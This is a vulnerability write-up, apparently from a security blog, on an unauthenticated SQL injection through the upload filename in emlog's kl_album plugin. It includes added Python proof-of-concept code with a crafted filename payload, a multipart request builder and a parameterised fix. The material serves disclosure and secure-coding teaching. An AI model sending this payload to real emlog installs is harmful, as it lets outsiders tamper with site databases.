Source: [http://www.leavesongs.com/PENETRATION/emlog-important-plugin-getshell.html]
Reading the source of the EM album plugin (kl_album) for emlog, we find this in kl_album_ajax_do.php:
```php
<?php
/**
 * kl_album_ajax_do.php
 * design by KLLER
 */
require_once('../../../init.php');
$DB = MySql::getInstance();
$kl_album_config = unserialize(Option::get('kl_album_config'));
// Upload branch: runs (and exits) before the admin check further down.
if(isset($_POST['album']) && isset($_FILES['Filedata'])){
    if(function_exists('ini_get')){
        $kl_album_memory_limit = ini_get('memory_limit');
        $kl_album_memory_limit = substr($kl_album_memory_limit, 0, strlen($kl_album_memory_limit)-1);
        $kl_album_memory_limit = ($kl_album_memory_limit+20).'M';
        ini_set('memory_limit', $kl_album_memory_limit);
    }
    define('KL_UPLOADFILE_MAXSIZE', kl_album_get_upload_max_filesize());
    define('KL_UPLOADFILE_PATH', '../../../content/plugins/kl_album/upload/');
    define('KL_IMG_ATT_MAX_W', 100);//maximum thumbnail width for image attachments
    define('KL_IMG_ATT_MAX_H', 100);//maximum thumbnail height for image attachments
    $att_type = array('jpg', 'jpeg', 'png', 'gif');//file types allowed for upload
    $album = isset($_POST['album']) ? intval($_POST['album']) : '';
    if($_FILES['Filedata']['error'] != 4){
        $upfname = kl_album_upload_file($_FILES['Filedata']['name'], $_FILES['Filedata']['error'], $_FILES['Filedata']['tmp_name'], $_FILES['Filedata']['size'], $_FILES['Filedata']['type'], $att_type);
        $photo_size = chImageSize(EMLOG_ROOT.substr($upfname, 2), KL_IMG_ATT_MAX_W, KL_IMG_ATT_MAX_H);
        // $_FILES['Filedata']['name'] (client-chosen filename) is interpolated into the SQL unescaped
        $result = $DB->query("INSERT INTO ".DB_PREFIX."kl_album(truename, filename, description, album, addtime, w, h) VALUES('{$_FILES['Filedata']['name']}', '{$upfname}', '".date('Y-m-d', time())."', {$album}, ".time().", {$photo_size['w']}, {$photo_size['h']})");
        if($result){
            $new_id = $DB->insert_id();
            $the_option_value = Option::get('kl_album_'.$album);
            if($the_option_value !== null){
                $the_option_value = trim($new_id.','.$the_option_value, ',');
                Option::updateOption('kl_album_'.$album, $the_option_value);
                $CACHE->updateCache('options');
            }
        }
    }
    exit;
}
if(ROLE != 'admin') exit('access deined!');
if(isset($_GET['action']) && $_GET['action']!=''){...
```
Inside the upload `if` branch there is this line:
```php
$result = $DB->query("INSERT INTO ".DB_PREFIX."kl_album(truename, filename, description, album, addtime, w, h) VALUES('{$_FILES['Filedata']['name']}', '{$upfname}', '".date('Y-m-d', time())."', {$album}, ".time().", {$photo_size['w']}, {$photo_size['h']})");
```
`$_FILES['Filedata']['name']` is the filename the client sends in the multipart `Content-Disposition` header, and it is interpolated straight into the INSERT statement with no escaping or quoting, so this is a SQL injection. Of the other values, `$album` goes through `intval()` and `w`/`h` come from `chImageSize()`, which leaves `truename` as the attacker-controlled value: a single quote in the filename closes the string literal, and everything after it becomes part of the query. Note also where this code sits: the upload branch ends with `exit;` before the `if(ROLE != 'admin')` check, so as far as the code shown goes, any request that carries an `album` field and a `Filedata` file reaches this query without an administrator session.
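To make the injection point concrete, here is an added example (my own code, not from the original post or from the plugin) that rebuilds the plugin's INSERT string the way the PHP does, builds the multipart upload request that delivers a crafted filename, and runs both the interpolated query and a parameterised one against an in-memory SQLite table with the same columns. The table, the `emlog_` prefix, the crafted filename and the sample paths are all constructed here; SQLite accepts the same `-- -` comment as MySQL, but it only stands in for the real database, so a real check has to be made against the MySQL-backed target.

```python
import sqlite3
import time

# Assumed table prefix; emlog reads the real DB_PREFIX from its config file.
DB_PREFIX = "emlog_"


def build_plugin_query(truename, upfname, album, w, h, now=0):
    """Rebuild the INSERT exactly as kl_album_ajax_do.php does: every value is
    interpolated into the string and truename (the client-supplied upload
    filename) is not escaped. `now` replaces PHP's time() so the output is
    deterministic; the date is computed in UTC here, PHP uses the server zone."""
    day = time.strftime("%Y-%m-%d", time.gmtime(now))
    return (
        "INSERT INTO " + DB_PREFIX + "kl_album"
        "(truename, filename, description, album, addtime, w, h) "
        f"VALUES('{truename}', '{upfname}', '{day}', {int(album)}, {now}, {int(w)}, {int(h)})"
    )


def multipart_upload_body(album, filename, file_bytes, boundary="----kl"):
    """Constructed multipart/form-data body for a POST to kl_album_ajax_do.php.
    PHP turns the filename= parameter below into $_FILES['Filedata']['name']
    (directory components stripped), so the attacker chooses it freely."""
    crlf = b"\r\n"
    b = boundary.encode()
    return b"".join([
        b"--" + b + crlf
        + b'Content-Disposition: form-data; name="album"' + crlf + crlf
        + str(int(album)).encode() + crlf,
        b"--" + b + crlf
        + b'Content-Disposition: form-data; name="Filedata"; filename="'
        + filename.encode() + b'"' + crlf
        + b"Content-Type: image/jpeg" + crlf + crlf
        + file_bytes + crlf,
        b"--" + b + b"--" + crlf,
    ])


def fresh_db():
    """In-memory SQLite table with the plugin's columns (constructed stand-in)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE " + DB_PREFIX + "kl_album (gid INTEGER PRIMARY KEY, truename TEXT, "
        "filename TEXT, description TEXT, album INTEGER, addtime INTEGER, w INTEGER, h INTEGER)"
    )
    return conn


def row_for(conn, truename_prefix):
    cur = conn.execute(
        "SELECT truename, filename, album FROM " + DB_PREFIX + "kl_album WHERE truename LIKE ?",
        (truename_prefix + "%",),
    )
    return cur.fetchone()


# A filename that closes the quoted truename value, supplies its own values for
# the remaining six columns and comments out the rest of the statement.
# "-- -" is a line comment in both MySQL and SQLite.
CRAFTED_NAME = "x.jpg', 'pwned.txt', 'd', 7, 0, 0, 0)-- -"
UPFNAME = "./content/plugins/kl_album/upload/1.jpg"   # sample value for $upfname


def demo_vulnerable():
    """Run the interpolated query: the attacker's VALUES list is what gets stored."""
    conn = fresh_db()
    q = build_plugin_query(CRAFTED_NAME, UPFNAME, album=1, w=100, h=80)
    conn.execute(q)   # still one statement, so mysql_query-style APIs accept it
    return q, row_for(conn, "x.jpg")


def insert_parameterised(conn, truename, upfname, album, w, h, now=0):
    """Hardened form: placeholders, so the filename is data and never SQL."""
    day = time.strftime("%Y-%m-%d", time.gmtime(now))
    conn.execute(
        "INSERT INTO " + DB_PREFIX + "kl_album"
        "(truename, filename, description, album, addtime, w, h) VALUES(?, ?, ?, ?, ?, ?, ?)",
        (truename, upfname, day, int(album), now, int(w), int(h)),
    )


def demo_fixed():
    conn = fresh_db()
    insert_parameterised(conn, CRAFTED_NAME, UPFNAME, album=1, w=100, h=80)
    return row_for(conn, "x.jpg")


if __name__ == "__main__":
    q, row = demo_vulnerable()
    print(q)
    print("vulnerable:", row)   # ('x.jpg', 'pwned.txt', 7): attacker-chosen columns
    print("fixed:     ", demo_fixed())   # crafted name stored verbatim, album 1
```

`demo_vulnerable()` shows the practical consequence: once the quote is closed, the `filename`, `album` and the remaining columns of the row are whatever the uploader puts in the filename, while the parameterised insert in `demo_fixed()` stores the crafted name as an ordinary string. `multipart_upload_body()` is the request shape to use when verifying this against a test instance, since browsers will not normally send a filename containing quotes.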